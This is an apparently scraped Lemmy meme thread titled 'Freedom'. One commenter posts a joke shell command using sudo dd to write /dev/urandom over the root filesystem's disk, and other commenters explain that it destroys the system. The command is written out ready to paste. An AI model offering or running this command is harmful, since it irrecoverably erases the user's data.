azha@lemm.ee to linuxmemes@lemmy.worldEnglish · 1 month agoFreedomlemm.eeexternal-linkmessage-square36fedilinkarrow-up1694arrow-down114
arrow-up1680arrow-down1external-linkFreedomlemm.eeazha@lemm.ee to linuxmemes@lemmy.worldEnglish · 1 month agomessage-square36fedilink
minus-squarecogman@lemmy.worldlinkfedilinkarrow-up18·edit-21 month agosudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1) (Omit the $ if you are using the fish terminal)
minus-squarefeannag@sh.itjust.workslinkfedilinkEnglisharrow-up3arrow-down1·1 month agoOne good use for AI was a great breakdown of what exactly that command does. I like it.
minus-squarestembolts@programming.devlinkfedilinkarrow-up11·edit-21 month ago“Write random shit to root.” There is a reason they call dd the disk-destroyer.
sudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1)
(Omit the
$
if you are using the fish terminal)One good use for AI was a great breakdown of what exactly that command does. I like it.
“Write random shit to root.”
There is a reason they call dd the disk-destroyer.